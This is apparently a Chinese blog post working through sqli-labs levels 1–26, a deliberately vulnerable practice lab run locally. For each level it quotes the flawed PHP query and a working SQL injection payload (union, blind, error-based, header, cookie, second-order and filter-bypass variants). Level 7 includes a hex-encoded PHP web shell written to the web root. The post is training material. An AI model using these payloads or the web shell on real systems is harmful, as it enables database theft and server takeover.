sqli-labs

感觉自己实在太菜了,唉,练练注入吧,熟悉一下各种语句,这样以后比赛不会被吊打的太难看。
环境:docker
mysql u:root p:123456

sudo docker pull 0bajie0/sqli-labs:v1
sudo docker run -ti --name sqli -p 2333:8080 0bajie0/sqli-labs:v1 /bin/bash
./run.sh

Less-1

code:

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

payload:
判断注入:
http://127.0.0.1:2333/Less-1/?id=2'and 1=1 --+
判断列数
http://127.0.0.1:2333/Less-1/?id=2' order by 3 --+
判断数据库
http://127.0.0.1:2333/Less-1/?id=2' and 1=2 union select 1,database(),3 --+
判断表名:
通过limit限制在一个显示位里多次显示表名
用16进制绕过单引号拦截
http://127.0.0.1:2333/Less-1/?id=2' and 1=2 union select 1,table_name,3 from information_schema.tables where table_schema=0x7365637572697479 limit 0,1--+
判断列名:
用group_concat()在一个显示位同时显示多条结果
http://127.0.0.1:2333/Less-1/?id=2' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_name = 'emails' and table_schema = 'security' --+
数据内容:
http://127.0.0.1:2333/Less-1/?id=2' and 1=2 union select 1,group_concat(email_id),3 from emails --+

Less2

code:

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

payload:
用#号注释
http://127.0.0.1:2333/Less-2/?id=-1 union select 1,2,group_concat(email_id) from emails %23

Less3

code:

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

payload:
http://127.0.0.1:2333/Less-3/?id=-1') union select 1,2,group_concat(email_id) from emails %23

Less4

code:

$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

payload:
http://127.0.0.1:2333/Less-4/?id=1") and 1>2 union select 1,2,group_concat(email_id) from emails --+

Less5

code:

error_reporting(0);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$row = mysql_fetch_array($result);
    if($row)
{echo 'You are in...........';}
    else
{print_r(mysql_error());

error_reporting(0) 关闭错误报告
error_reporting(E_ALL) 开启错误报告
mysql_error() 返回上一个 MySQL 操作产生的文本错误信息,打印了这个可以用报错。
这个不显示数据。可用盲注或者报错
payload:
time-based-sleep:
http://127.0.0.1:2333/Less-5/?id=1' and if(ascii(substring((select email_id from emails limit 0,1),1,1))=68,sleep(5),0) --+
time-based-benchmark:
http://127.0.0.1:2333/Less-5/?id=1' and case when ascii(mid((select email_id from emails limit 0,1),1,1))<80 then benchmark(10000000,sha1(0x616263)) else 0 end --+
bool-based:
http://127.0.0.1:2333/Less-5/?id=1' and ascii(mid((select email_id from emails limit 0,1),1,1))>50 %23

Less6:

和5一样的,只是闭合不同,这道就用报错吧
code:

$id = '"'.$id.'"';

payload:
updatexml:
http://127.0.0.1:2333/Less-6/?id=1" and updatexml(1,concat(0x7e,(select email_id from emails limit 0,1)),1)--+

Less7

code:

$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
if($row)
{echo 'You are in.... Use outfile......';}
else 
{echo 'You have an error in your SQL syntax'; }

返回的一个通用错误页面,没得报错,也不返回数据,可盲注,但是这关让写文件。
payload:
http://127.0.0.1:2333/Less-7/?id=1')) union select 1,2,3,0x3C3F7068702073797374656D28245F4745545B2763275D293B3F3E into outfile '/var/www/html/sqli-labs/shell.php'--+
linux下mysql默认以--secure-file-priv运行,就算有权限也写不进去,我这里就没写进去-.-

Less8

code:

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
echo 'You are in...........';

布尔盲注
payload:
http://127.0.0.1:2333/Less-8/?id=1' and ascii(mid((select email_id from emails limit 0,1),1,1))>50--+

Less9

code:

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
echo 'You are in...........';

时间盲注
payload:
http://127.0.0.1:2333/Less-9/?id=1' and if(ascii(mid((select email_id from emails limit 0,1),1,1))>50,sleep(5),0)--+

Less10

code:

$id = '"'.$id.'"';

时间盲注
payload:
http://127.0.0.1:2333/Less-10/?id=1" and case when ascii(mid((select email_id from emails limit 0,1),1,1))>50 then sleep(2) else 0 end--+

Less11

code:

$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
print_r(mysql_error());

post注入
双查询报错
payload:

uname=1' union select 1,2,3,4 from (select+count(*),concat(floor(rand(0)*5),( select email_id from emails limit 1,1))a from information_schema.tables group by a)b%23&passwd=

Less12

code:

    $uname='"'.$uname.'"';
    $passwd='"'.$passwd.'"';
其他和11一样

payload:
uname=1&passwd=1") union select 1,2,3,4 from (select+count(*),concat(floor(rand(0)*5),( select email_id from emails limit 1,1))a from information_schema.tables group by a)b%23

Less13

code:

@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";

payload:
uname=1&passwd=1') union select 1,2,3,4 from (select+count(*),concat(floor(rand(0)*5),( select email_id from emails limit 1,1))a from information_schema.tables group by a)b%23
哇这个程序的作者有点丧心病狂啊,每种注入都要各种闭合来一遍-。-

Less14

code:

    $uname='"'.$uname.'"';
    $passwd='"'.$passwd.'"'; 
    @$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";

payload:
双查询的语句记不住,我还是觉得updatexml好用,能自己写出来
uname=1&passwd=1" and updatexml(1,concat(0x7e,(select email_id from emails limit 1,1)),1) --
注意到,这里空格不需要用+代替了,因为这不是在url里面,而是post。

Less15

code:

@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

没有报错。
盲注
payload:
uname=1&passwd=1' union select 1,if(ascii(mid((select email_id from emails limit 1,1),1,1))>50,sleep(5),0) %23
这道题发现个问题,就是如果用and来接连接注入语句的话不会延时,用or延时也会有问题,所以这里用的联合查询。

Less16

code:

    $uname='"'.$uname.'"';
    $passwd='"'.$passwd.'"'; 
    @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";

payload:
uname=1&passwd=1") union select 1,if(ascii(mid((select email_id from emails limit 1,1),1,1))>10,sleep(5),0) %23

Less17

code:

$passwd=$_POST['passwd'];
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";

报错
payload:
uname=Dhakkan&passwd=1' and updatexml(1,concat(0x7e,(select email_id from emails limit 1,1)),1)%23

Less18

code:

$uagent = $_SERVER['HTTP_USER_AGENT'];
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
print_r(mysql_error());

user-agent处注入,而且在insert里面,可报错
但是insert却要登录成功才会被执行--,所以要先知道帐号密码
payload:
User-Agent: 1' and updatexml(1,concat(0x7e,(select email_id from emails limit 1,1)),1) and '1'='1
似乎只能在insert内写报错语句

Less19

code:

$uagent = $_SERVER['HTTP_REFERER'];
$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";

payload:
Referer: 1' and updatexml(1,concat(0x7e,(select email_id from emails limit 1,1)),1) and '1'='1

Less20

code:

$cookee = $row1['username'];
setcookie('uname', $cookee, time()+3600);
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";

代码还是蛮简单的,流程下来就是不post东西,直接在cookie里uname字段写注入就行了。
payload:
Cookie: uname=admin' and extractvalue(1,concat(0x7e,(select email_id from emails limit 1,1))) -- -
这道题发现个新问题,就是关于 -- 这个注释,最好这样写-- -容错比较好。

Less21

code:

先看的22关,这关和22只有闭合不同而已

payload:
Cookie: uname=bWluJykgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgZW1haWxfaWQgZnJvbSBlbWFpbHMgbGltaXQgMSwxKSkpIC0tIC0=

Less22

code:

$cookee = $_COOKIE['uname'];
$cookee = base64_decode($cookee);
$cookee1 = '"'. $cookee. '"';
$sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";

和20关唯一不同的就是双引号闭合,再b64编码一下
payload:
Cookie: uname=bWluIiBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBlbWFpbF9pZCBmcm9tIGVtYWlscyBsaW1pdCAxLDEpKSkgLS0gLQ==

Less23

code:

$id=$_GET['id'];
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

这里会把注释都替换空,不能注释了。但可以直接构造闭合
payload:
http://127.0.0.1:2333/Less-23/?id=1' and case when ascii(mid((select email_id from emails limit 0,1),1,1))>50 then sleep(5) else 0 end and '1'='1

基础关结束了,心累啊。

Less24

code:
这道题所有的外部直接提交的变量都进行了转义,不能直接注入(双字节例外)

$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
代码太多不贴了,反正就是一个二次注入,注册的时候用户名里的'被加上转义符,保存到数据库里就是一个正常的单引号,后面改密码那里又再次调用了这个用户名,导致可以用这个单引号来闭合。

payload:
注册用户名: admin' -- -,密码123,登录,改密码。
二次注入就是sql语句里的变量直接从数据库取出嘛,和普通注入没啥区别。

Less25

code:

$id= preg_replace('/or/i',"", $id);
$id= preg_replace('/AND/i',"", $id);

and和or的大小写都被替空
payload:
绕过很简单
1)&&,||
2)aandnd,oorr
http://127.0.0.1:2333/Less-25/?id=1' aandnd updatexml(1,concat(0x7e,(select username from users limit 1,1)),1)%23

Less25a

code:

和Less25的区别就是不打印mysql_error(),不能报错

payload:
http://127.0.0.1:2333/Less-25a/?id=1 aandnd if((ascii(mid((select username from users limit 0,1),1,1))>50),sleep(5),0) -- -

Less26

code:

$id= preg_replace('/or/i',"", $id);            
$id= preg_replace('/and/i',"", $id);        
$id= preg_replace('/[\/\*]/',"", $id);        
$id= preg_replace('/[--]/',"", $id);        
$id= preg_replace('/[#]/',"", $id);            
$id= preg_replace('/[\s]/',"", $id);    
$id= preg_replace('/[\/\\\\]/',"", $id);    

过滤了or,and,/*,--,#,空白符...
对字符过滤的绕过都很简单,如Less25
绕过空格:
1)注释 /**/ 这关不能用
2)括号 select(1)and(1)
3)%a0
绕过注释:
;%00
union前面的1是单引号包起的,不需要空格。
最后就是我们注入的时候返回数据需要limit限制,limit后的空格不能用()代替,可以用%a0代替空格。
payload:

http://127.0.0.1:2333/Less-26/
?id=1' union(select(1),(2),(updatexml(1,(concat(0x7e,(select(username)from(users)limit%a01))),1)));%00

标签: none

添加新评论